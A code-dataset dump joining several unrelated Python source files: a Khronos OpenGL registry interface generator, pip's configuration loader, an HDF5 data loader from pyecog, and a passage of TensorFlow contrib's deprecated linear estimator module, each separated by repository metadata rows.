sys.path.append(os.path.dirname(os.path.dirname(__file__)))
import khr_util.format
import khr_util.registry
import khr_util.registry_cache
SCRIPTS_DIR = os.path.dirname(__file__)
OPENGL_DIR = os.path.normpath(os.path.join(SCRIPTS_DIR, "..", "..", "framework", "opengl"))
EGL_DIR = os.path.normpath(os.path.join(SCRIPTS_DIR, "..", "..", "framework", "egl"))
OPENGL_INC_DIR = os.path.join(OPENGL_DIR, "wrapper")
GL_SOURCE = khr_util.registry_cache.RegistrySource(
"https://raw.githubusercontent.com/KhronosGroup/OpenGL-Registry",
"xml/gl.xml",
"b7aee529f02340247e45621e9dbd054817d39c71",
"9a5e5d6b8b45df8d8f95c56f8fc0bc9ab99e675f43a9509aa2b222bcc9ed715a")
EXTENSIONS = [
'GL_KHR_texture_compression_astc_ldr',
'GL_KHR_blend_equation_advanced',
'GL_KHR_blend_equation_advanced_coherent',
'GL_KHR_debug',
'GL_EXT_robustness',
'GL_KHR_robustness',
'GL_KHR_no_error',
'GL_KHR_parallel_shader_compile',
'GL_EXT_bgra',
'GL_EXT_geometry_point_size',
'GL_EXT_tessellation_shader',
'GL_EXT_geometry_shader',
'GL_EXT_texture_buffer',
'GL_EXT_texture_filter_anisotropic',
'GL_EXT_texture_cube_map_array',
'GL_EXT_texture_snorm',
'GL_EXT_primitive_bounding_box',
'GL_EXT_texture_compression_s3tc',
'GL_EXT_texture_type_2_10_10_10_REV',
'GL_EXT_clip_control',
'GL_EXT_copy_image',
'GL_EXT_depth_bounds_test',
'GL_EXT_direct_state_access',
'GL_EXT_draw_buffers_indexed',
'GL_EXT_draw_elements_base_vertex',
'GL_EXT_direct_state_access',
'GL_EXT_read_format_bgra',
'GL_EXT_texture_storage',
'GL_EXT_texture_sRGB_decode',
'GL_EXT_texture_border_clamp',
'GL_EXT_texture_sRGB_R8',
'GL_EXT_texture_sRGB_RG8',
'GL_EXT_debug_marker',
'GL_EXT_polygon_offset_clamp',
'GL_IMG_texture_compression_pvrtc',
'GL_OES_EGL_image',
'GL_OES_EGL_image_external',
'GL_OES_compressed_ETC1_RGB8_texture',
'GL_OES_compressed_paletted_texture',
'GL_OES_required_internalformat',
'GL_OES_packed_depth_stencil',
'GL_OES_texture_3D',
'GL_OES_texture_half_float',
'GL_OES_texture_storage_multisample_2d_array',
'GL_OES_sample_shading',
'GL_OES_standard_derivatives',
'GL_OES_stencil1',
'GL_OES_stencil4',
'GL_OES_surfaceless_context',
'GL_OES_mapbuffer',
'GL_OES_vertex_array_object',
'GL_OES_viewport_array',
'GL_ARB_clip_control',
'GL_ARB_buffer_storage',
'GL_ARB_compute_shader',
'GL_ARB_draw_indirect',
'GL_ARB_draw_instanced',
'GL_ARB_draw_elements_base_vertex',
'GL_ARB_direct_state_access',
'GL_ARB_get_program_binary',
'GL_ARB_gl_spirv',
'GL_ARB_indirect_parameters',
'GL_ARB_internalformat_query',
'GL_ARB_instanced_arrays',
'GL_ARB_multi_draw_indirect',
'GL_ARB_parallel_shader_compile',
'GL_ARB_program_interface_query',
'GL_ARB_separate_shader_objects',
'GL_ARB_shader_ballot',
'GL_ARB_shader_image_load_store',
'GL_ARB_shader_viewport_layer_array',
'GL_ARB_sparse_buffer',
'GL_ARB_sparse_texture',
'GL_ARB_spirv_extensions',
'GL_ARB_tessellation_shader',
'GL_ARB_texture_barrier',
'GL_ARB_texture_filter_minmax',
'GL_ARB_texture_gather',
'GL_ARB_texture_storage',
'GL_ARB_texture_storage_multisample',
'GL_ARB_texture_multisample',
'GL_ARB_texture_view',
'GL_ARB_transform_feedback2',
'GL_ARB_transform_feedback3',
'GL_ARB_transform_feedback_instanced',
'GL_ARB_transform_feedback_overflow_query',
'GL_ARB_vertex_array_bgra',
'GL_ARB_vertex_attrib_64bit',
'GL_ARB_vertex_attrib_binding',
'GL_NV_deep_texture3D',
'GL_NV_gpu_multicast',
'GL_NV_internalformat_sample_query',
'GL_NVX_cross_process_interop',
'GL_OES_draw_elements_base_vertex',
'GL_OVR_multiview',
'GL_OVR_multiview_multisampled_render_to_texture',
]
def getGLRegistry ():
return khr_util.registry_cache.getRegistry(GL_SOURCE)
def getHybridInterface (stripAliasedExtCommands = True):
# This is a bit awkward, since we have to create a strange hybrid
# interface that includes both GL and ES features and extensions.
registry = getGLRegistry()
glFeatures = registry.getFeatures('gl')
esFeatures = registry.getFeatures('gles2')
spec = khr_util.registry.InterfaceSpec()
for feature in registry.getFeatures('gl'):
spec.addFeature(feature, 'gl', 'core')
for feature in registry.getFeatures('gles2'):
spec.addFeature(feature, 'gles2')
for extName in EXTENSIONS:
extension = registry.extensions[extName]
# Add all extensions using the ES2 api, but force even non-ES2
# extensions to be included.
spec.addExtension(extension, 'gles2', 'core', force=True)
iface = khr_util.registry.createInterface(registry, spec, 'gles2')
if stripAliasedExtCommands:
# Remove redundant extension commands that are already provided by core.
strippedCmds = []
for command in iface.commands:
if command.alias == None:
strippedCmds.append(command)
iface.commands = strippedCmds
return iface
def versionCheck(version):
if type(version) is bool:
if version == False:
return True
if type(version) is str:
return version < "3.2"
raise "Version check failed"
def getInterface (registry, api, version=None, profile=None, **kwargs):
spec = khr_util.registry.spec(registry, api, version, profile, **kwargs)
if api == 'gl' and profile == 'core' and versionCheck(version):
gl32 = registry.features['GL_VERSION_3_2']
for eRemove in gl32.xpath('remove'):
spec.addComponent(eRemove)
return khr_util.registry.createInterface(registry, spec, api)
def getVersionToken (api, version):
prefixes = { 'gles2': "ES", 'gl': "GL" }
return prefixes[api] + version.replace(".", "")
def genCommandList(iface, renderCommand, directory, filename, align=False):
lines = map(renderCommand, iface.commands)
lines = filter(lambda l: l != None, lines)
if align:
lines = indentLines(lines)
writeInlFile(os.path.join(directory, filename), lines)
def genCommandLists(registry, renderCommand, check, directory, filePattern, align=False):
for eFeature in registry.features:
api = eFeature.get('api')
version = eFeature.get('number')
profile = check(api, version)
if profile is True:
profile = None
elif profile is False:
continue
iface = getInterface(registry, api, version=version, profile=profile)
filename = filePattern % getVersionToken(api, version)
genCommandList(iface, renderCommand, directory, filename, align)
def getFunctionTypeName (funcName):
return "%sFunc" % funcName
def getFunctionMemberName (funcName):
assert funcName[:2] == "gl"
if funcName[:5] == "glEGL":
# Otherwise we end up with gl.eGLImage...
return "egl%s" % funcName[5:]
else:
return "%c%s" % (funcName[2].lower(), funcName[3:])
INL_HEADER = khr_util.format.genInlHeader("Khronos GL API description (gl.xml)", GL_SOURCE.getRevision())
def writeInlFile (filename, source):
khr_util.format.writeInlFile(filename, INL_HEADER, source)
# Aliases from khr_util.common
indentLines = khr_util.format.indentLines
normalizeConstant = khr_util.format.normalizeConstant
commandParams = khr_util.format.commandParams
commandArgs = khr_util.format.commandArgs
| 32.572614 | 105 | 0.759363 |
01b68abf1c2fa93f151142cc9ee129f042097ad1 | 4,107 | py | Python | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | null | null | null | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | null | null | null | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | 1 | 2020-12-18T10:39:35.000Z | 2020-12-18T10:39:35.000Z | """Configuration management setup
"""
import os
import re
import sys
from pip._vendor.six.moves import configparser
from pip.locations import (
config_basename, legacy_config_file, running_under_virtualenv,
site_config_files
)
from pip.utils import appdirs
_environ_prefix_re = re.compile(r"^PIP_", re.I)
class Configuration(object):
"""Handles the loading of configuration files and providing an interface to
accessing data within them.
"""
def __init__(self, isolated):
self._configparser = configparser.RawConfigParser()
self._config = {}
self.isolated = isolated
def load(self, section):
"""Loads configuration
"""
self._load_config_files(section)
if not self.isolated:
self._load_environment_vars()
def items(self):
"""Returns key-value pairs like dict.values() representing the loaded
configuration
"""
return self._config.items()
def _load_config_files(self, section):
"""Loads configuration from configuration files
"""
files = self._get_config_files()
if files:
self._configparser.read(files)
for section in ('global', section):
self._config.update(
self._normalize_keys(self._get_config_section(section))
)
def _load_environment_vars(self):
"""Loads configuration from environment variables
"""
self._config.update(self._normalize_keys(self._get_environ_vars()))
def _normalize_keys(self, items):
"""Return a config dictionary with normalized keys regardless of
whether the keys were specified in environment variables or in config
files"""
normalized = {}
for key, val in items:
key = key.replace('_', '-')
if key.startswith('--'):
key = key[2:] # only prefer long opts
normalized[key] = val
return normalized
def _get_environ_vars(self):
"""Returns a generator with all environmental vars with prefix PIP_"""
for key, val in os.environ.items():
if _environ_prefix_re.search(key):
yield (_environ_prefix_re.sub("", key).lower(), val)
def _get_config_files(self):
"""Returns configuration files in a defined order.
The order is that the first files are overridden by the latter files;
like what ConfigParser expects.
"""
# the files returned by this method will be parsed in order with the
# first files listed being overridden by later files in standard
# ConfigParser fashion
config_file = os.environ.get('PIP_CONFIG_FILE', False)
if config_file == os.devnull:
return []
# at the base we have any site-wide configuration
files = list(site_config_files)
# per-user configuration next
if not self.isolated:
if config_file and os.path.exists(config_file):
files.append(config_file)
else:
# This is the legacy config file, we consider it to be a lower
# priority than the new file location.
files.append(legacy_config_file)
# This is the new config file, we consider it to be a higher
# priority than the legacy file.
files.append(
os.path.join(
appdirs.user_config_dir("pip"),
config_basename,
)
)
# finally virtualenv configuration first trumping others
if running_under_virtualenv():
venv_config_file = os.path.join(
sys.prefix,
config_basename,
)
if os.path.exists(venv_config_file):
files.append(venv_config_file)
return files
def _get_config_section(self, section):
if self._configparser.has_section(section):
return self._configparser.items(section)
return []
| 32.338583 | 79 | 0.60823 |
1d109ee9be7eccbded7febf27adcb7733b6c04e2 | 3,990 | py | Python | pyecog/ndf/h5loader.py | mikailweston/pyecog | 9a1674ec95b63ad9aa0a2d3aedc1a74be6441446 | [
"MIT"
] | 10 | 2016-09-07T16:01:39.000Z | 2019-03-26T11:14:28.000Z | pyecog/ndf/h5loader.py | mikailweston/pyecog | 9a1674ec95b63ad9aa0a2d3aedc1a74be6441446 | [
"MIT"
] | 54 | 2016-11-21T14:41:52.000Z | 2022-03-18T08:41:11.000Z | pyecog/ndf/h5loader.py | jcornford/pyecog | 356439bd5e3c50fd0cd74eef90a897bd41363920 | [
"MIT"
] | 5 | 2016-10-11T14:14:44.000Z | 2017-08-02T11:45:48.000Z | import h5py
import numpy as np
import matplotlib.pyplot as plt
import time
import sys
import pandas as pd
class H5Dataset():
"""
This is initially to just load up the h5 file converted by the ndf loader
# todo everything should be simplified into one dictionary...
"""
def __init__(self,fpath, mcode_id_str):
self.fpath = fpath
self.mcode_id_str = mcode_id_str
self.h5dataset = None
self.data = None
self.time = None
self.features_df = None
self.features = None
self.fs = None
self.mode_std = None
self.feature_col_labels = None
self._load_data()
def _load_data(self):
with h5py.File(self.fpath, 'r+') as f:
tid_dataset = f[self.mcode_id_str]
for member in tid_dataset.keys():
if str(member) == 'data':
self.data = np.array(tid_dataset['data'])
if str(member) == 'time':
self.time = np.array(tid_dataset['time'])
if str(member) == 'features':
self.features = np.array(tid_dataset['features'])
for att_key in tid_dataset.attrs.keys():
#['fs', 'tid', 'time_arr_info_dict', 'resampled', 'col_names', ;mode_std]
if str(att_key) == 'col_names':
self.feature_col_labels = list(tid_dataset.attrs['col_names'])
if str(att_key) == 'fs':
self.fs = tid_dataset.attrs['fs']
if str(att_key) == 'mode_std':
self.mode_std = tid_dataset.attrs['mode_std']
if self.time is None:
time_arr_info_dict = eval(tid_dataset.attrs['time_arr_info_dict'])
self.time = np.linspace(time_arr_info_dict['min_t'],
time_arr_info_dict['max_t'],
num= time_arr_info_dict['max_t'] * time_arr_info_dict['fs'])
if self.features is not None:
self.features_df = pd.DataFrame(self.features, columns = [b.decode("utf-8") for b in self.feature_col_labels])
def plot(self):
print ('Placeholder: Plot method to implement!')
# have indexing argument...
class H5File():
'''
Class for reading h5 files:
Use transmitter id to index which transmitter you want to access:
h5obj = H5File(path_to_h5_file)here)
h5obj[2] # for transmitter 2
Attributes available are:
- h5obj[2].time
- h5obj[2].data
# to do - first test that other modules dont treat as dictionary before finalising this.
'''
def __init__(self, filepath):
self.filepath = filepath
with h5py.File(self.filepath, 'r+') as f:
if sys.version_info < (3,):
self.attributes = dict(f.attrs.iteritems())
else:
self.attributes = dict(f.attrs.items())
# eg. {'t_ids': array([ 1, 2 ]), 'fs_dict': '{1: 512.0, 2: 512.0, 'num_channels': 2}
self.attributes['Mcode'] = list(f.keys())[0] # list in case there is more than one M1etc
def __repr__(self):
return 'Better formatting coming soon... \nAttributes:'+str(self.attributes)
def __getitem__(self, tid):
assert tid in self.attributes['t_ids'], 'ERROR: Invalid tid for file'
tid_dataset = H5Dataset(self.filepath, self.attributes['Mcode']+'/'+str(tid))
# again, retarded coding going on here - just have one master dict
group_contents = {}
group_contents['data'] = tid_dataset.data
group_contents['time'] = tid_dataset.time
group_contents['features'] = tid_dataset.features
group_contents['feature_col_names'] = tid_dataset.feature_col_labels
group_contents['mode_std'] = tid_dataset.mode_std
group_contents['fs'] = tid_dataset.fs
group_contents['features_df'] = tid_dataset.features_df
return group_contents
| 37.641509 | 127 | 0.590727 |
c62f3f26135ec6d3b8fa1b4bfa873ab712356c11 | 39,969 | py | Python | Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | JustinACoder/H22-GR3-UnrealAI | 361eb9ef1147f8a2991e5f98c4118cd823184adf | [
"MIT"
] | 6 | 2022-02-04T18:12:24.000Z | 2022-03-21T23:57:12.000Z | Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings | 1fa4cd6a566c8745f455fc3d2273208f21f88ced | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings | 1fa4cd6a566c8745f455fc3d2273208f21f88ced | [
"bzip2-1.0.6"
] | 1 | 2022-02-08T03:53:23.000Z | 2022-02-08T03:53:23.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import six
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.layers.python.layers import feature_column
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.utils import export
from tensorflow.contrib.linear_optimizer.python import sdca_optimizer
from tensorflow.python.feature_column import feature_column as fc_core
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training as train
from tensorflow.python.training import training_util
# The default learning rate of 0.2 is a historical artifact of the initial
# implementation, but seems a reasonable choice.
_LEARNING_RATE = 0.2
def _get_optimizer(spec):
if isinstance(spec, six.string_types):
return layers.OPTIMIZER_CLS_NAMES[spec](
learning_rate=_LEARNING_RATE)
elif callable(spec):
return spec()
return spec
# TODO(ispir): Remove this function by fixing '_infer_model' with single outputs
# and as_iteable case.
def _as_iterable(preds, output):
for pred in preds:
yield pred[output]
def _add_bias_column(feature_columns, columns_to_tensors, bias_variable,
columns_to_variables):
"""Adds a fake bias feature column filled with all 1s."""
# TODO(b/31008490): Move definition to a common constants place.
bias_column_name = "tf_virtual_bias_column"
if any(col.name is bias_column_name for col in feature_columns):
raise ValueError("%s is a reserved column name." % bias_column_name)
if not feature_columns:
raise ValueError("feature_columns can't be empty.")
# Loop through input tensors until we can figure out batch_size.
batch_size = None
for column in columns_to_tensors.values():
if isinstance(column, tuple):
column = column[0]
if isinstance(column, sparse_tensor.SparseTensor):
shape = tensor_util.constant_value(column.dense_shape)
if shape is not None:
batch_size = shape[0]
break
else:
batch_size = array_ops.shape(column)[0]
break
if batch_size is None:
raise ValueError("Could not infer batch size from input features.")
bias_column = layers.real_valued_column(bias_column_name)
columns_to_tensors[bias_column] = array_ops.ones([batch_size, 1],
dtype=dtypes.float32)
columns_to_variables[bias_column] = [bias_variable]
def _linear_model_fn(features, labels, mode, params, config=None):
"""A model_fn for linear models that use a gradient-based optimizer.
Args:
features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance.
* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: string, `Optimizer` object, or callable that defines the
optimizer to use for training. If `None`, will use a FTRL optimizer.
* gradient_clip_norm: A float > 0. If provided, gradients are
clipped to their global norm with this clipping ratio.
* joint_weights: If True, the weights for all columns will be stored in a
single (possibly partitioned) variable. It's more efficient, but it's
incompatible with SDCAOptimizer, and requires all feature columns are
sparse and use the 'sum' combiner.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If mode is not any of the `ModeKeys`.
"""
head = params["head"]
feature_columns = params["feature_columns"]
optimizer = params.get("optimizer") or _get_default_optimizer(feature_columns)
gradient_clip_norm = params.get("gradient_clip_norm", None)
num_ps_replicas = config.num_ps_replicas if config else 0
joint_weights = params.get("joint_weights", False)
if not isinstance(features, dict):
features = {"": features}
parent_scope = "linear"
partitioner = partitioned_variables.min_max_variable_partitioner(
max_partitions=num_ps_replicas,
min_slice_size=64 << 20)
with variable_scope.variable_scope(
parent_scope,
values=tuple(six.itervalues(features)),
partitioner=partitioner) as scope:
if all([isinstance(fc, feature_column._FeatureColumn) # pylint: disable=protected-access
for fc in feature_columns]):
if joint_weights:
layer_fn = layers.joint_weighted_sum_from_feature_columns
else:
layer_fn = layers.weighted_sum_from_feature_columns
logits, _, _ = layer_fn(
columns_to_tensors=features,
feature_columns=feature_columns,
num_outputs=head.logits_dimension,
weight_collections=[parent_scope],
scope=scope)
else:
logits = fc_core.linear_model(
features=features,
feature_columns=feature_columns,
units=head.logits_dimension,
weight_collections=[parent_scope])
def _train_op_fn(loss):
global_step = training_util.get_global_step()
my_vars = ops.get_collection(parent_scope)
grads = gradients.gradients(loss, my_vars)
if gradient_clip_norm:
grads, _ = clip_ops.clip_by_global_norm(grads, gradient_clip_norm)
return (_get_optimizer(optimizer).apply_gradients(
zip(grads, my_vars), global_step=global_step))
return head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=_train_op_fn,
logits=logits)
def sdca_model_fn(features, labels, mode, params):
"""A model_fn for linear models that use the SDCA optimizer.
Args:
features: A dict of `Tensor` keyed by column name.
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance. Type must be one of `_BinarySvmHead`,
`_RegressionHead` or `_BinaryLogisticHead`.
* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: An `SDCAOptimizer` instance.
* weight_column_name: A string defining the weight feature column, or
None if there are no weights.
* update_weights_hook: A `SessionRunHook` object or None. Used to update
model weights.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If `optimizer` is not an `SDCAOptimizer` instance.
ValueError: If the type of head is neither `_BinarySvmHead`, nor
`_RegressionHead` nor `_MultiClassHead`.
ValueError: If mode is not any of the `ModeKeys`.
"""
head = params["head"]
feature_columns = params["feature_columns"]
optimizer = params["optimizer"]
weight_column_name = params["weight_column_name"]
update_weights_hook = params.get("update_weights_hook", None)
if not isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("Optimizer must be of type SDCAOptimizer")
if isinstance(head, head_lib._BinarySvmHead): # pylint: disable=protected-access
loss_type = "hinge_loss"
elif isinstance(head, head_lib._BinaryLogisticHead): # pylint: disable=protected-access
loss_type = "logistic_loss"
elif isinstance(head, head_lib._RegressionHead): # pylint: disable=protected-access
assert head.logits_dimension == 1, ("SDCA only applies for "
"logits_dimension=1.")
loss_type = "squared_loss"
else:
raise ValueError("Unsupported head type: {}".format(head))
parent_scope = "linear"
with variable_scope.variable_scope(
values=features.values(),
name_or_scope=parent_scope,
partitioner=optimizer.partitioner) as scope:
features = features.copy()
features.update(layers.transform_features(features, feature_columns))
logits, columns_to_variables, bias = (
layers.weighted_sum_from_feature_columns(
columns_to_tensors=features,
feature_columns=feature_columns,
num_outputs=1,
scope=scope))
_add_bias_column(feature_columns, features, bias, columns_to_variables)
def _train_op_fn(unused_loss):
global_step = training_util.get_global_step()
sdca_model, train_op = optimizer.get_train_step(columns_to_variables,
weight_column_name,
loss_type, features,
labels, global_step)
if update_weights_hook is not None:
update_weights_hook.set_parameters(sdca_model, train_op)
return train_op
model_fn_ops = head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=_train_op_fn,
logits=logits)
if update_weights_hook is not None:
return model_fn_ops._replace(
training_chief_hooks=(model_fn_ops.training_chief_hooks +
[update_weights_hook]))
return model_fn_ops
# Ensures consistency with LinearComposableModel.
def _get_default_optimizer(feature_columns):
learning_rate = min(_LEARNING_RATE, 1.0 / math.sqrt(len(feature_columns)))
return train.FtrlOptimizer(learning_rate=learning_rate)
class _SdcaUpdateWeightsHook(session_run_hook.SessionRunHook):
"""SessionRunHook to update and shrink SDCA model weights."""
def __init__(self):
pass
def set_parameters(self, sdca_model, train_op):
self._sdca_model = sdca_model
self._train_op = train_op
def begin(self):
"""Construct the update_weights op.
The op is implicitly added to the default graph.
"""
self._update_op = self._sdca_model.update_weights(self._train_op)
def before_run(self, run_context):
"""Return the update_weights op so that it is executed during this run."""
return session_run_hook.SessionRunArgs(self._update_op)
class LinearClassifier(estimator.Estimator):
"""Linear classifier model.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a linear model to classify instances into one of multiple possible
classes. When number of possible classes is 2, this is binary classification.
Example:
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
# Estimator using the default optimizer.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b])
# Or estimator using the FTRL optimizer with regularization.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
optimizer=tf.train.FtrlOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Or estimator using the SDCAOptimizer.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
optimizer=tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id',
num_loss_partitions=...,
symmetric_l2_regularization=2.0
))
# Input builders
def input_fn_train: # returns x, y (where y represents label's class index).
...
def input_fn_eval: # returns x, y (where y represents label's class index).
...
def input_fn_predict: # returns x, None.
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
# predict_classes returns class indices.
estimator.predict_classes(input_fn=input_fn_predict)
```
If the user specifies `label_keys` in constructor, labels must be strings from
the `label_keys` vocabulary. Example:
```python
label_keys = ['label0', 'label1', 'label2']
estimator = LinearClassifier(
n_classes=n_classes,
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
label_keys=label_keys)
def input_fn_train: # returns x, y (where y is one of label_keys).
pass
estimator.fit(input_fn=input_fn_train)
def input_fn_eval: # returns x, y (where y is one of label_keys).
pass
estimator.evaluate(input_fn=input_fn_eval)
def input_fn_predict: # returns x, None
# predict_classes returns one of label_keys.
estimator.predict_classes(input_fn=input_fn_predict)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_weight pylint: disable=invalid-name
feature_columns,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=False,
_joint_weight=False,
config=None,
feature_engineering_fn=None,
label_keys=None):
"""Construct a `LinearClassifier` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
n_classes: number of label classes. Default is binary classification.
Note that class labels are integers representing the class index (i.e.
values from 0 to n_classes-1). For arbitrary label values (e.g. string
labels), convert to class indices first.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: The optimizer used to train the model. If specified, it should
be either an instance of `tf.Optimizer` or the SDCAOptimizer. If `None`,
the Ftrl optimizer will be used.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
_joint_weight: If True, the weights for all columns will be stored in a
single (possibly partitioned) variable. It's more efficient, but it's
incompatible with SDCAOptimizer, and requires all feature columns are
sparse and use the 'sum' combiner.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
label_keys: Optional list of strings with size `[n_classes]` defining the
label vocabulary. Only supported for `n_classes` > 2.
Returns:
A `LinearClassifier` estimator.
Raises:
ValueError: if n_classes < 2.
ValueError: if enable_centered_bias=True and optimizer is SDCAOptimizer.
"""
if (isinstance(optimizer, sdca_optimizer.SDCAOptimizer) and
enable_centered_bias):
raise ValueError("enable_centered_bias is not supported with SDCA")
self._feature_columns = tuple(feature_columns or [])
assert self._feature_columns
chief_hook = None
head = head_lib.multi_class_head(
n_classes,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
label_keys=label_keys)
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
}
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
assert not _joint_weight, ("_joint_weight is incompatible with the"
" SDCAOptimizer")
assert n_classes == 2, "SDCA only applies to binary classification."
model_fn = sdca_model_fn
# The model_fn passes the model parameters to the chief_hook. We then use
# the hook to update weights and shrink step only on the chief.
chief_hook = _SdcaUpdateWeightsHook()
params.update({
"weight_column_name": weight_column_name,
"update_weights_hook": chief_hook,
})
else:
model_fn = _linear_model_fn
params.update({
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weight,
})
super(LinearClassifier, self).__init__(
model_fn=model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
@deprecated_arg_values(
"2017-03-01",
"Please switch to predict_classes, or set `outputs` argument.",
outputs=None)
def predict(self, x=None, input_fn=None, batch_size=None, outputs=None,
as_iterable=True):
"""Returns predictions for given features.
By default, returns predicted classes. But this default will be dropped
soon. Users should either pass `outputs`, or call `predict_classes` method.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
outputs: list of `str`, name of the output to predict.
If `None`, returns classes.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes with shape [batch_size] (or an iterable
of predicted classes if as_iterable is True). Each predicted class is
represented by its class index (i.e. integer from 0 to n_classes-1).
If `outputs` is set, returns a dict of predictions.
"""
if not outputs:
return self.predict_classes(
x=x,
input_fn=input_fn,
batch_size=batch_size,
as_iterable=as_iterable)
return super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=outputs,
as_iterable=as_iterable)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_classes(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted classes for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
